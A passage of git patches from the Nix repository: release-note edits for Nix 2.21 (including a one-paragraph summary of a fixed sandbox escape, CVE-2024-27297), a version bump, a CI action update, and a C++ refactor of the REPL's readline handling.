+    );
+  in
+    b
+  ```
+
+  Nix would correctly enter the debugger at `builtins.break a`, but if you asked
+  it to `:continue`, it would skip over the `builtins.break "hello"` expression
+  entirely.
+
+  Now, Nix will correctly enter the debugger at both breakpoints.
+
+- Fix a FOD sandbox escape
+
+  Cooperating Nix derivations could send file descriptors to files in the Nix
+  store to each other via Unix domain sockets in the abstract namespace. This
+  allowed one derivation to modify the output of the other derivation, after Nix
+  has registered the path as "valid" and immutable in the Nix database.
+  In particular, this allowed the output of fixed-output derivations to be
+  modified from their expected content.
+
+  This isn't the case any more.
+
+- Nested debuggers are no longer supported [#9920](https://github.com/NixOS/nix/pull/9920)
+
+  Previously, evaluating an expression that throws an error in the debugger would
+  enter a second, nested debugger:
+
+  ```
+  nix-repl> builtins.throw "what"
+  error: what
+
+
+  Starting REPL to allow you to inspect the current state of the evaluator.
+
+  Welcome to Nix 2.18.1. Type :? for help.
+
+  nix-repl>
+  ```
+
+  Now, it just prints the error message like `nix repl`:
+
+  ```
+  nix-repl> builtins.throw "what"
+  error:
+         … while calling the 'throw' builtin
+           at «string»:1:1:
+              1| builtins.throw "what"
+               | ^
+
+         error: what
+  ```
+
+- consistent order of lambda formals in printed expressions [#9874](https://github.com/NixOS/nix/pull/9874)
+
+  Always print lambda formals in lexicographic order rather than the internal, creation-time based symbol order.
+  This makes printed formals independent of the context they appear in.
+
+- fix duplicate attribute error positions for `inherit` [#9874](https://github.com/NixOS/nix/pull/9874)
+
+  When an inherit caused a duplicate attribute error the position of the error was not reported correctly, placing the error with the inherit itself or at the start of the bindings block instead of the offending attribute name.
+
+- `inherit (x) ...` evaluates `x` only once [#9847](https://github.com/NixOS/nix/pull/9847)
+
+  `inherit (x) a b ...` now evaluates the expression `x` only once for all inherited attributes rather than once for each inherited attribute.
+  This does not usually have a measurable impact, but side-effects (such as `builtins.trace`) would be duplicated and expensive expressions (such as derivations) could cause a measurable slowdown.
+
+- Functions are printed with more detail [#7145](https://github.com/NixOS/nix/issues/7145) [#9606](https://github.com/NixOS/nix/pull/9606)
+
+  Functions and `builtins` are printed with more detail in `nix repl`, `nix
+  eval`, `builtins.trace`, and most other places values are printed.
+
+  Before:
+
+  ```
+  $ nix repl nixpkgs
+  nix-repl> builtins.map
+  «primop»
+
+  nix-repl> builtins.map lib.id
+  «primop-app»
+
+  nix-repl> builtins.trace lib.id "my-value"
+  trace: 
+  "my-value"
+
+  $ nix eval --file functions.nix
+  { id = ; primop = ; primop-app = ; }
+  ```
+
+  After:
+
+  ```
+  $ nix repl nixpkgs
+  nix-repl> builtins.map
+  «primop map»
+
+  nix-repl> builtins.map lib.id
+  «partially applied primop map»
+
+  nix-repl> builtins.trace lib.id "my-value"
+  trace: «lambda id @ /nix/store/8rrzq23h2zq7sv5l2vhw44kls5w0f654-source/lib/trivial.nix:26:5»
+  "my-value"
+
+  $ nix eval --file functions.nix
+  { id = «lambda id @ /Users/wiggles/nix/functions.nix:2:8»; primop = «primop map»; primop-app = «partially applied primop map»; }
+  ```
+
+  This was actually released in Nix 2.20, but wasn't added to the release notes
+  so we're announcing it here. The historical release notes have been updated as well.
+
+  [type-error]: https://github.com/NixOS/nix/pull/9753
+  [coercion-error]: https://github.com/NixOS/nix/pull/9754
+
+- Store paths are allowed to start with `.` [#912](https://github.com/NixOS/nix/issues/912) [#9091](https://github.com/NixOS/nix/pull/9091) [#9095](https://github.com/NixOS/nix/pull/9095) [#9120](https://github.com/NixOS/nix/pull/9120) [#9121](https://github.com/NixOS/nix/pull/9121) [#9122](https://github.com/NixOS/nix/pull/9122) [#9130](https://github.com/NixOS/nix/pull/9130) [#9219](https://github.com/NixOS/nix/pull/9219) [#9224](https://github.com/NixOS/nix/pull/9224) [#9867](https://github.com/NixOS/nix/pull/9867)
+
+  Leading periods were allowed by accident in Nix 2.4. The Nix team has considered this to be a bug, but this behavior has since been relied on by users, leading to unnecessary difficulties.
+  From now on, leading periods are officially, definitively supported. The names `.` and `..` are disallowed, as well as those starting with `.-` or `..-`.
+
+  Nix versions that denied leading periods are documented [in the issue](https://github.com/NixOS/nix/issues/912#issuecomment-1919583286).
+
+- Nix commands respect Ctrl-C [#7245](https://github.com/NixOS/nix/issues/7245) [#6995](https://github.com/NixOS/nix/pull/6995) [#9687](https://github.com/NixOS/nix/pull/9687)
+
+  Previously, many Nix commands would hang indefinitely if Ctrl-C was pressed
+  while performing various operations (including `nix develop`, `nix flake
+  update`, and so on). With several fixes to Nix's signal handlers, Nix commands
+  will now exit quickly after Ctrl-C is pressed.
+
+  This was actually released in Nix 2.20, but wasn't added to the release notes
+  so we're announcing it here. The historical release notes have been updated as well.
+
+- `nix repl` pretty-prints values [#9931](https://github.com/NixOS/nix/pull/9931)
+
+  `nix repl` will now pretty-print values:
+
+  ```
+  {
+    attrs = {
+      a = {
+        b = {
+          c = { };
+        };
+      };
+    };
+    list = [ 1 ];
+    list' = [
+      1
+      2
+      3
+    ];
+  }
+  ```
+
+- Introduction of `--regex` and `--all` in `nix profile remove` and `nix profile upgrade` [#10166](https://github.com/NixOS/nix/pull/10166)
+
+  Previously the command-line arguments for `nix profile remove` and `nix profile upgrade` matched the package entries using regular expression.
+  For instance:
+
+  ```
+  nix profile remove '.*vim.*'
+  ```
+
+  This would remove all packages that contain `vim` in their name.
+
+  In most cases, only singular package names were used to remove and upgrade packages. Mixing this with regular expressions sometimes lead to unintended behavior. For instance, `python3.1` could match `python311`.
+
+  To avoid unintended behavior, the arguments are now only matching exact names.
+
+  Matching using regular expressions is still possible by using the new `--regex` flag:
+
+  ```
+  nix profile remove --regex '.*vim.*'
+  ```
+
+  One of the most useful cases for using regular expressions was to upgrade all packages. This was previously accomplished by:
+
+  ```
+  nix profile upgrade '.*'
+  ```
+
+  With the introduction of the `--all` flag, this now becomes more straightforward:
+
+  ```
+  nix profile upgrade --all
+  ```
+
+- Visual clutter in `--debugger` is reduced [#9919](https://github.com/NixOS/nix/pull/9919)
+
+  Before:
+  ```
+  info: breakpoint reached
+
+
+  Starting REPL to allow you to inspect the current state of the evaluator.
+
+  Welcome to Nix 2.20.0pre20231222_dirty. Type :? for help.
+
+  nix-repl> :continue
+  error: uh oh
+
+
+  Starting REPL to allow you to inspect the current state of the evaluator.
+
+  Welcome to Nix 2.20.0pre20231222_dirty. Type :? for help.
+
+  nix-repl>
+  ```
+
+  After:
+
+  ```
+  info: breakpoint reached
+
+  Nix 2.20.0pre20231222_dirty debugger
+  Type :? for help.
+  nix-repl> :continue
+  error: uh oh
+
+  nix-repl>
+  ```
+
+- `nix repl` now respects Ctrl-C while printing values [#9927](https://github.com/NixOS/nix/pull/9927)
+
+  `nix repl` will now halt immediately when Ctrl-C is pressed while it's printing
+  a value. This is useful if you got curious about what would happen if you
+  printed all of Nixpkgs.
+
+- Cycle detection in `nix repl` is simpler and more reliable [#8672](https://github.com/NixOS/nix/issues/8672) [#9926](https://github.com/NixOS/nix/pull/9926)
+
+  The cycle detection in `nix repl`, `nix eval`, `builtins.trace`, and everywhere
+  else values are printed is now simpler and matches the cycle detection in
+  `nix-instantiate --eval` output.
+
+  Before:
+
+  ```
+  nix eval --expr 'let self = { inherit self; }; in self'
+  { self = { self = «repeated»; }; }
+  ```
+
+  After:
+
+  ```
+  { self = «repeated»; }
+  ```
+
+- In the debugger, `while evaluating the attribute` errors now include position information [#9915](https://github.com/NixOS/nix/pull/9915)
+
+  Before:
+
+  ```
+  0: while evaluating the attribute 'python311.pythonForBuild.pkgs'
+  0x600001522598
+  ```
+
+  After:
+
+  ```
+  0: while evaluating the attribute 'python311.pythonForBuild.pkgs'
+  /nix/store/hg65h51xnp74ikahns9hyf3py5mlbbqq-source/overrides/default.nix:132:27
+
+     131|
+     132|       bootstrappingBase = pkgs.${self.python.pythonAttr}.pythonForBuild.pkgs;
+        |                           ^
+     133|     in
+  ```
+
+- Stack size is increased on macOS [#9860](https://github.com/NixOS/nix/pull/9860)
+
+  Previously, Nix would set the stack size to 64MiB on Linux, but would leave the
+  stack size set to the default (approximately 8KiB) on macOS. Now, the stack
+  size is correctly set to 64MiB on macOS as well, which should reduce stack
+  overflow segfaults in deeply-recursive Nix expressions.
+

From 4c97a66b4cfd6cb645a26be88c89ca51e48839f7 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Mon, 11 Mar 2024 18:00:10 +0100
Subject: [PATCH 614/654] Tweak release notes

---
 doc/manual/src/release-notes/rl-2.21.md | 96 +++++--------------------
 1 file changed, 16 insertions(+), 80 deletions(-)

diff --git a/doc/manual/src/release-notes/rl-2.21.md b/doc/manual/src/release-notes/rl-2.21.md
index 707b56ce1..75114f117 100644
--- a/doc/manual/src/release-notes/rl-2.21.md
+++ b/doc/manual/src/release-notes/rl-2.21.md
@@ -1,5 +1,16 @@
 # Release 2.21.0 (2024-03-11)
 
+- Fix a fixed-output derivation sandbox escape (CVE-2024-27297)
+
+  Cooperating Nix derivations could send file descriptors to files in the Nix
+  store to each other via Unix domain sockets in the abstract namespace. This
+  allowed one derivation to modify the output of the other derivation, after Nix
+  has registered the path as "valid" and immutable in the Nix database.
+  In particular, this allowed the output of fixed-output derivations to be
+  modified from their expected content.
+
+  This isn't the case any more.
+
 - CLI options `--arg-from-file` and `--arg-from-stdin` [#10122](https://github.com/NixOS/nix/pull/10122)
 
   The new CLI option `--arg-from-file` *name* *path* passes the contents
@@ -102,17 +113,6 @@
 
   Now, Nix will correctly enter the debugger at both breakpoints.
 
-- Fix a FOD sandbox escape
-
-  Cooperating Nix derivations could send file descriptors to files in the Nix
-  store to each other via Unix domain sockets in the abstract namespace. This
-  allowed one derivation to modify the output of the other derivation, after Nix
-  has registered the path as "valid" and immutable in the Nix database.
-  In particular, this allowed the output of fixed-output derivations to be
-  modified from their expected content.
-
-  This isn't the case any more.
-
 - Nested debuggers are no longer supported [#9920](https://github.com/NixOS/nix/pull/9920)
 
   Previously, evaluating an expression that throws an error in the debugger would
@@ -143,84 +143,26 @@
          error: what
   ```
 
-- consistent order of lambda formals in printed expressions [#9874](https://github.com/NixOS/nix/pull/9874)
+- Consistent order of function arguments in printed expressions [#9874](https://github.com/NixOS/nix/pull/9874)
 
-  Always print lambda formals in lexicographic order rather than the internal, creation-time based symbol order.
-  This makes printed formals independent of the context they appear in.
+  Function arguments are now printed in lexicographic order rather than the internal, creation-time based symbol order.
 
-- fix duplicate attribute error positions for `inherit` [#9874](https://github.com/NixOS/nix/pull/9874)
+- Fix duplicate attribute error positions for `inherit` [#9874](https://github.com/NixOS/nix/pull/9874)
 
-  When an inherit caused a duplicate attribute error the position of the error was not reported correctly, placing the error with the inherit itself or at the start of the bindings block instead of the offending attribute name.
+  When an `inherit` caused a duplicate attribute error the position of the error was not reported correctly, placing the error with the inherit itself or at the start of the bindings block instead of the offending attribute name.
 
 - `inherit (x) ...` evaluates `x` only once [#9847](https://github.com/NixOS/nix/pull/9847)
 
   `inherit (x) a b ...` now evaluates the expression `x` only once for all inherited attributes rather than once for each inherited attribute.
   This does not usually have a measurable impact, but side-effects (such as `builtins.trace`) would be duplicated and expensive expressions (such as derivations) could cause a measurable slowdown.
 
-- Functions are printed with more detail [#7145](https://github.com/NixOS/nix/issues/7145) [#9606](https://github.com/NixOS/nix/pull/9606)
-
-  Functions and `builtins` are printed with more detail in `nix repl`, `nix
-  eval`, `builtins.trace`, and most other places values are printed.
-
-  Before:
-
-  ```
-  $ nix repl nixpkgs
-  nix-repl> builtins.map
-  «primop»
-
-  nix-repl> builtins.map lib.id
-  «primop-app»
-
-  nix-repl> builtins.trace lib.id "my-value"
-  trace: 
-  "my-value"
-
-  $ nix eval --file functions.nix
-  { id = ; primop = ; primop-app = ; }
-  ```
-
-  After:
-
-  ```
-  $ nix repl nixpkgs
-  nix-repl> builtins.map
-  «primop map»
-
-  nix-repl> builtins.map lib.id
-  «partially applied primop map»
-
-  nix-repl> builtins.trace lib.id "my-value"
-  trace: «lambda id @ /nix/store/8rrzq23h2zq7sv5l2vhw44kls5w0f654-source/lib/trivial.nix:26:5»
-  "my-value"
-
-  $ nix eval --file functions.nix
-  { id = «lambda id @ /Users/wiggles/nix/functions.nix:2:8»; primop = «primop map»; primop-app = «partially applied primop map»; }
-  ```
-
-  This was actually released in Nix 2.20, but wasn't added to the release notes
-  so we're announcing it here. The historical release notes have been updated as well.
-
-  [type-error]: https://github.com/NixOS/nix/pull/9753
-  [coercion-error]: https://github.com/NixOS/nix/pull/9754
-
 - Store paths are allowed to start with `.` [#912](https://github.com/NixOS/nix/issues/912) [#9091](https://github.com/NixOS/nix/pull/9091) [#9095](https://github.com/NixOS/nix/pull/9095) [#9120](https://github.com/NixOS/nix/pull/9120) [#9121](https://github.com/NixOS/nix/pull/9121) [#9122](https://github.com/NixOS/nix/pull/9122) [#9130](https://github.com/NixOS/nix/pull/9130) [#9219](https://github.com/NixOS/nix/pull/9219) [#9224](https://github.com/NixOS/nix/pull/9224) [#9867](https://github.com/NixOS/nix/pull/9867)
 
   Leading periods were allowed by accident in Nix 2.4. The Nix team has considered this to be a bug, but this behavior has since been relied on by users, leading to unnecessary difficulties.
-  From now on, leading periods are officially, definitively supported. The names `.` and `..` are disallowed, as well as those starting with `.-` or `..-`.
+  From now on, leading periods are supported. The names `.` and `..` are disallowed, as well as those starting with `.-` or `..-`.
 
   Nix versions that denied leading periods are documented [in the issue](https://github.com/NixOS/nix/issues/912#issuecomment-1919583286).
 
-- Nix commands respect Ctrl-C [#7245](https://github.com/NixOS/nix/issues/7245) [#6995](https://github.com/NixOS/nix/pull/6995) [#9687](https://github.com/NixOS/nix/pull/9687)
-
-  Previously, many Nix commands would hang indefinitely if Ctrl-C was pressed
-  while performing various operations (including `nix develop`, `nix flake
-  update`, and so on). With several fixes to Nix's signal handlers, Nix commands
-  will now exit quickly after Ctrl-C is pressed.
-
-  This was actually released in Nix 2.20, but wasn't added to the release notes
-  so we're announcing it here. The historical release notes have been updated as well.
-
 - `nix repl` pretty-prints values [#9931](https://github.com/NixOS/nix/pull/9931)
 
   `nix repl` will now pretty-print values:
@@ -311,12 +253,6 @@
   nix-repl>
   ```
 
-- `nix repl` now respects Ctrl-C while printing values [#9927](https://github.com/NixOS/nix/pull/9927)
-
-  `nix repl` will now halt immediately when Ctrl-C is pressed while it's printing
-  a value. This is useful if you got curious about what would happen if you
-  printed all of Nixpkgs.
-
 - Cycle detection in `nix repl` is simpler and more reliable [#8672](https://github.com/NixOS/nix/issues/8672) [#9926](https://github.com/NixOS/nix/pull/9926)
 
   The cycle detection in `nix repl`, `nix eval`, `builtins.trace`, and everywhere

From 7f45b1c8d8caf4beeb68c981ae813d6251a7ee63 Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Mon, 11 Mar 2024 09:21:24 -0700
Subject: [PATCH 615/654] Add release note

---
 doc/manual/rl-next/nix-eval-derivations.md | 13 +++++++++++++
 1 file changed, 13 insertions(+)
 create mode 100644 doc/manual/rl-next/nix-eval-derivations.md

diff --git a/doc/manual/rl-next/nix-eval-derivations.md b/doc/manual/rl-next/nix-eval-derivations.md
new file mode 100644
index 000000000..ed0a73384
--- /dev/null
+++ b/doc/manual/rl-next/nix-eval-derivations.md
@@ -0,0 +1,13 @@
+---
+synopsis: "`nix eval` prints derivations as `.drv` paths"
+prs: 10200
+---
+
+`nix eval` will now print derivations as their `.drv` paths, rather than as
+attribute sets. This makes commands like `nix eval nixpkgs#bash` terminate
+instead of infinitely looping into recursive self-referential attributes:
+
+```ShellSession
+$ nix eval nixpkgs#bash
+«derivation /nix/store/m32cbgbd598f4w299g0hwyv7gbw6rqcg-bash-5.2p26.drv»
+```

From db36c9ca90794fe82e66d4e0fb7754875978de29 Mon Sep 17 00:00:00 2001
From: Viktor Sonesten 
Date: Mon, 11 Mar 2024 19:17:45 +0100
Subject: [PATCH 616/654] nix-copy: document --all --from local binary cache
 example

---
 src/nix/copy.md | 6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/src/nix/copy.md b/src/nix/copy.md
index 199006436..6ab7cdee3 100644
--- a/src/nix/copy.md
+++ b/src/nix/copy.md
@@ -11,6 +11,12 @@ R""(
   Note the `file://` - without this, the destination is a chroot
   store, not a binary cache.
 
+* Copy all store paths from a local binary cache in `/tmp/cache` to the local store:
+
+  ```console
+  # nix copy --all --from file:///tmp/cache
+  ```
+
 * Copy the entire current NixOS system closure to another machine via
   SSH:
 

From 222c38370fcf3ae52bc1883aafcadbbad3df7d1c Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Mon, 11 Mar 2024 21:16:10 +0100
Subject: [PATCH 617/654] Bump version

---
 .version | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/.version b/.version
index db65e2167..f48f82fa2 100644
--- a/.version
+++ b/.version
@@ -1 +1 @@
-2.21.0
+2.22.0

From aa121dc318db9918545554aad14c490b7088cf59 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Mon, 11 Mar 2024 22:02:01 +0000
Subject: [PATCH 618/654] Bump cachix/install-nix-action from 25 to 26

Bumps [cachix/install-nix-action](https://github.com/cachix/install-nix-action) from 25 to 26.
- [Release notes](https://github.com/cachix/install-nix-action/releases)
- [Commits](https://github.com/cachix/install-nix-action/compare/v25...v26)

---
updated-dependencies:
- dependency-name: cachix/install-nix-action
  dependency-type: direct:production
  update-type: version-update:semver-major
...

Signed-off-by: dependabot[bot] 
---
 .github/workflows/ci.yml | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 620a84b79..8bd355cca 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -20,7 +20,7 @@ jobs:
     - uses: actions/checkout@v4
       with:
         fetch-depth: 0
-    - uses: cachix/install-nix-action@v25
+    - uses: cachix/install-nix-action@v26
       with:
         # The sandbox would otherwise be disabled by default on Darwin
         extra_nix_config: "sandbox = true"
@@ -62,7 +62,7 @@ jobs:
       with:
         fetch-depth: 0
     - run: echo CACHIX_NAME="$(echo $GITHUB_REPOSITORY-install-tests | tr "[A-Z]/" "[a-z]-")" >> $GITHUB_ENV
-    - uses: cachix/install-nix-action@v25
+    - uses: cachix/install-nix-action@v26
       with:
         install_url: https://releases.nixos.org/nix/nix-2.20.3/install
     - uses: cachix/cachix-action@v14
@@ -84,7 +84,7 @@ jobs:
     steps:
     - uses: actions/checkout@v4
     - run: echo CACHIX_NAME="$(echo $GITHUB_REPOSITORY-install-tests | tr "[A-Z]/" "[a-z]-")" >> $GITHUB_ENV
-    - uses: cachix/install-nix-action@v25
+    - uses: cachix/install-nix-action@v26
       with:
         install_url: '${{needs.installer.outputs.installerURL}}'
         install_options: "--tarball-url-prefix https://${{ env.CACHIX_NAME }}.cachix.org/serve"
@@ -114,7 +114,7 @@ jobs:
     - uses: actions/checkout@v4
       with:
         fetch-depth: 0
-    - uses: cachix/install-nix-action@v25
+    - uses: cachix/install-nix-action@v26
       with:
         install_url: https://releases.nixos.org/nix/nix-2.20.3/install
     - run: echo CACHIX_NAME="$(echo $GITHUB_REPOSITORY-install-tests | tr "[A-Z]/" "[a-z]-")" >> $GITHUB_ENV

From 76aced691552e193e0225af40f8acf484cfeaefe Mon Sep 17 00:00:00 2001
From: Jade Lovelace 
Date: Mon, 26 Feb 2024 01:21:54 -0800
Subject: [PATCH 619/654] finally.hh: delete copy constructor which is a bad
 idea

---
 src/libutil/finally.hh | 9 ++++++++-
 1 file changed, 8 insertions(+), 1 deletion(-)

diff --git a/src/libutil/finally.hh b/src/libutil/finally.hh
index 4cae20a36..f9f0195a1 100644
--- a/src/libutil/finally.hh
+++ b/src/libutil/finally.hh
@@ -11,8 +11,15 @@ class [[nodiscard("Finally values must be used")]] Finally
 {
 private:
     Fn fun;
+    bool movedFrom = false;
 
 public:
     Finally(Fn fun) : fun(std::move(fun)) { }
-    ~Finally() { fun(); }
+    // Copying Finallys is definitely not a good idea and will cause them to be
+    // called twice.
+    Finally(Finally &other) = delete;
+    Finally(Finally &&other) : fun(std::move(other.fun)) {
+        other.movedFrom = true;
+    }
+    ~Finally() { if (!movedFrom) fun(); }
 };

From 70a6ce139bd39f915a6c2c499d741e2c27557dc0 Mon Sep 17 00:00:00 2001
From: Jade Lovelace 
Date: Mon, 26 Feb 2024 00:34:11 -0800
Subject: [PATCH 620/654] refactor: move readline stuff into its own file

This is in direct preparation for an automation mode of nix repl.
---
 src/libcmd/repl-interacter.cc | 175 ++++++++++++++++++++++++++++++++++
 src/libcmd/repl-interacter.hh |  48 ++++++++++
 src/libcmd/repl.cc            | 175 ++--------------------------------
 src/libcmd/repl.hh            |   5 -
 4 files changed, 232 insertions(+), 171 deletions(-)
 create mode 100644 src/libcmd/repl-interacter.cc
 create mode 100644 src/libcmd/repl-interacter.hh

diff --git a/src/libcmd/repl-interacter.cc b/src/libcmd/repl-interacter.cc
new file mode 100644
index 000000000..9aa1f7bb9
--- /dev/null
+++ b/src/libcmd/repl-interacter.cc
@@ -0,0 +1,175 @@
+#include "file-system.hh"
+#include "libcmd/repl.hh"
+#include 
+
+#ifdef USE_READLINE
+#include 
+#include 
+#else
+// editline < 1.15.2 don't wrap their API for C++ usage
+// (added in https://github.com/troglobit/editline/commit/91398ceb3427b730995357e9d120539fb9bb7461).
+// This results in linker errors due to to name-mangling of editline C symbols.
+// For compatibility with these versions, we wrap the API here
+// (wrapping multiple times on newer versions is no problem).
+extern "C" {
+#include 
+}
+#endif
+
+#include "signals.hh"
+#include "finally.hh"
+#include "repl-interacter.hh"
+
+namespace nix {
+
+namespace {
+// Used to communicate to NixRepl::getLine whether a signal occurred in ::readline.
+volatile sig_atomic_t g_signal_received = 0;
+
+void sigintHandler(int signo)
+{
+    g_signal_received = signo;
+}
+};
+
+static detail::ReplCompleterMixin * curRepl; // ugly
+
+static char * completionCallback(char * s, int * match)
+{
+    auto possible = curRepl->completePrefix(s);
+    if (possible.size() == 1) {
+        *match = 1;
+        auto * res = strdup(possible.begin()->c_str() + strlen(s));
+        if (!res)
+            throw Error("allocation failure");
+        return res;
+    } else if (possible.size() > 1) {
+        auto checkAllHaveSameAt = [&](size_t pos) {
+            auto & first = *possible.begin();
+            for (auto & p : possible) {
+                if (p.size() <= pos || p[pos] != first[pos])
+                    return false;
+            }
+            return true;
+        };
+        size_t start = strlen(s);
+        size_t len = 0;
+        while (checkAllHaveSameAt(start + len))
+            ++len;
+        if (len > 0) {
+            *match = 1;
+            auto * res = strdup(std::string(*possible.begin(), start, len).c_str());
+            if (!res)
+                throw Error("allocation failure");
+            return res;
+        }
+    }
+
+    *match = 0;
+    return nullptr;
+}
+
+static int listPossibleCallback(char * s, char *** avp)
+{
+    auto possible = curRepl->completePrefix(s);
+
+    if (possible.size() > (INT_MAX / sizeof(char *)))
+        throw Error("too many completions");
+
+    int ac = 0;
+    char ** vp = nullptr;
+
+    auto check = [&](auto * p) {
+        if (!p) {
+            if (vp) {
+                while (--ac >= 0)
+                    free(vp[ac]);
+                free(vp);
+            }
+            throw Error("allocation failure");
+        }
+        return p;
+    };
+
+    vp = check((char **) malloc(possible.size() * sizeof(char *)));
+
+    for (auto & p : possible)
+        vp[ac++] = check(strdup(p.c_str()));
+
+    *avp = vp;
+
+    return ac;
+}
+
+ReadlineLikeInteracter::Guard ReadlineLikeInteracter::init(detail::ReplCompleterMixin * repl)
+{
+    // Allow nix-repl specific settings in .inputrc
+    rl_readline_name = "nix-repl";
+    try {
+        createDirs(dirOf(historyFile));
+    } catch (SystemError & e) {
+        logWarning(e.info());
+    }
+#ifndef USE_READLINE
+    el_hist_size = 1000;
+#endif
+    read_history(historyFile.c_str());
+    auto oldRepl = curRepl;
+    curRepl = repl;
+    Guard restoreRepl([oldRepl] { curRepl = oldRepl; });
+#ifndef USE_READLINE
+    rl_set_complete_func(completionCallback);
+    rl_set_list_possib_func(listPossibleCallback);
+#endif
+    return restoreRepl;
+}
+
+bool ReadlineLikeInteracter::getLine(std::string & input, const std::string & prompt)
+{
+    struct sigaction act, old;
+    sigset_t savedSignalMask, set;
+
+    auto setupSignals = [&]() {
+        act.sa_handler = sigintHandler;
+        sigfillset(&act.sa_mask);
+        act.sa_flags = 0;
+        if (sigaction(SIGINT, &act, &old))
+            throw SysError("installing handler for SIGINT");
+
+        sigemptyset(&set);
+        sigaddset(&set, SIGINT);
+        if (sigprocmask(SIG_UNBLOCK, &set, &savedSignalMask))
+            throw SysError("unblocking SIGINT");
+    };
+    auto restoreSignals = [&]() {
+        if (sigprocmask(SIG_SETMASK, &savedSignalMask, nullptr))
+            throw SysError("restoring signals");
+
+        if (sigaction(SIGINT, &old, 0))
+            throw SysError("restoring handler for SIGINT");
+    };
+
+    setupSignals();
+    char * s = readline(prompt.c_str());
+    Finally doFree([&]() { free(s); });
+    restoreSignals();
+
+    if (g_signal_received) {
+        g_signal_received = 0;
+        input.clear();
+        return true;
+    }
+
+    if (!s)
+        return false;
+    input += s;
+    input += '\n';
+    return true;
+}
+
+ReadlineLikeInteracter::~ReadlineLikeInteracter()
+{
+    write_history(historyFile.c_str());
+}
+
+};
diff --git a/src/libcmd/repl-interacter.hh b/src/libcmd/repl-interacter.hh
new file mode 100644
index 000000000..e549bab36
--- /dev/null
+++ b/src/libcmd/repl-interacter.hh
@@ -0,0 +1,48 @@
+#pragma once
+/// @file
+
+#include "finally.hh"
+#include "types.hh"
+#include 
+#include 
+
+namespace nix {
+
+namespace detail {
+/** Provides the completion hooks for the repl, without exposing its complete
+ * internals. */
+struct ReplCompleterMixin {
+    virtual StringSet completePrefix(const std::string & prefix) = 0;
+};
+};
+
+enum class ReplPromptType {
+    ReplPrompt,
+    ContinuationPrompt,
+};
+
+class ReplInteracter
+{
+public:
+    using Guard = Finally>;
+
+    virtual Guard init(detail::ReplCompleterMixin * repl) = 0;
+    /** Returns a boolean of whether the interacter got EOF */
+    virtual bool getLine(std::string & input, const std::string & prompt) = 0;
+    virtual ~ReplInteracter(){};
+};
+
+class ReadlineLikeInteracter : public virtual ReplInteracter
+{
+    std::string historyFile;
+public:
+    ReadlineLikeInteracter(std::string historyFile)
+        : historyFile(historyFile)
+    {
+    }
+    virtual Guard init(detail::ReplCompleterMixin * repl) override;
+    virtual bool getLine(std::string & input, const std::string & prompt) override;
+    virtual ~ReadlineLikeInteracter() override;
+};
+
+};
diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc
index 8b83608fa..8af3c5ff3 100644
--- a/src/libcmd/repl.cc
+++ b/src/libcmd/repl.cc
@@ -3,32 +3,17 @@
 #include 
 #include 
 
-#include 
-
-#ifdef USE_READLINE
-#include 
-#include 
-#else
-// editline < 1.15.2 don't wrap their API for C++ usage
-// (added in https://github.com/troglobit/editline/commit/91398ceb3427b730995357e9d120539fb9bb7461).
-// This results in linker errors due to to name-mangling of editline C symbols.
-// For compatibility with these versions, we wrap the API here
-// (wrapping multiple times on newer versions is no problem).
-extern "C" {
-#include 
-}
-#endif
-
+#include "libcmd/repl-interacter.hh"
 #include "repl.hh"
 
 #include "ansicolor.hh"
-#include "signals.hh"
 #include "shared.hh"
 #include "eval.hh"
 #include "eval-cache.hh"
 #include "eval-inline.hh"
 #include "eval-settings.hh"
 #include "attr-path.hh"
+#include "signals.hh"
 #include "store-api.hh"
 #include "log-store.hh"
 #include "common-eval-args.hh"
@@ -38,7 +23,6 @@ extern "C" {
 #include "flake/flake.hh"
 #include "flake/lockfile.hh"
 #include "users.hh"
-#include "terminal.hh"
 #include "editor-for.hh"
 #include "finally.hh"
 #include "markdown.hh"
@@ -75,6 +59,7 @@ enum class ProcessLineResult {
 
 struct NixRepl
     : AbstractNixRepl
+    , detail::ReplCompleterMixin
     #if HAVE_BOEHMGC
     , gc
     #endif
@@ -90,17 +75,16 @@ struct NixRepl
     int displ;
     StringSet varNames;
 
-    const Path historyFile;
+    std::unique_ptr interacter;
 
     NixRepl(const SearchPath & searchPath, nix::ref store,ref state,
             std::function getValues);
-    virtual ~NixRepl();
+    virtual ~NixRepl() = default;
 
     ReplExitStatus mainLoop() override;
     void initEnv() override;
 
-    StringSet completePrefix(const std::string & prefix);
-    bool getLine(std::string & input, const std::string & prompt);
+    virtual StringSet completePrefix(const std::string & prefix) override;
     StorePath getDerivationPath(Value & v);
     ProcessLineResult processLine(std::string line);
 
@@ -143,16 +127,10 @@ NixRepl::NixRepl(const SearchPath & searchPath, nix::ref store, refstaticBaseEnv.get()))
-    , historyFile(getDataDir() + "/nix/repl-history")
+    , interacter(make_unique(getDataDir() + "/nix/repl-history"))
 {
 }
 
-
-NixRepl::~NixRepl()
-{
-    write_history(historyFile.c_str());
-}
-
 void runNix(Path program, const Strings & args,
     const std::optional & input = {})
 {
@@ -169,79 +147,6 @@ void runNix(Path program, const Strings & args,
     return;
 }
 
-static NixRepl * curRepl; // ugly
-
-static char * completionCallback(char * s, int *match) {
-  auto possible = curRepl->completePrefix(s);
-  if (possible.size() == 1) {
-    *match = 1;
-    auto *res = strdup(possible.begin()->c_str() + strlen(s));
-    if (!res) throw Error("allocation failure");
-    return res;
-  } else if (possible.size() > 1) {
-    auto checkAllHaveSameAt = [&](size_t pos) {
-      auto &first = *possible.begin();
-      for (auto &p : possible) {
-        if (p.size() <= pos || p[pos] != first[pos])
-          return false;
-      }
-      return true;
-    };
-    size_t start = strlen(s);
-    size_t len = 0;
-    while (checkAllHaveSameAt(start + len)) ++len;
-    if (len > 0) {
-      *match = 1;
-      auto *res = strdup(std::string(*possible.begin(), start, len).c_str());
-      if (!res) throw Error("allocation failure");
-      return res;
-    }
-  }
-
-  *match = 0;
-  return nullptr;
-}
-
-static int listPossibleCallback(char *s, char ***avp) {
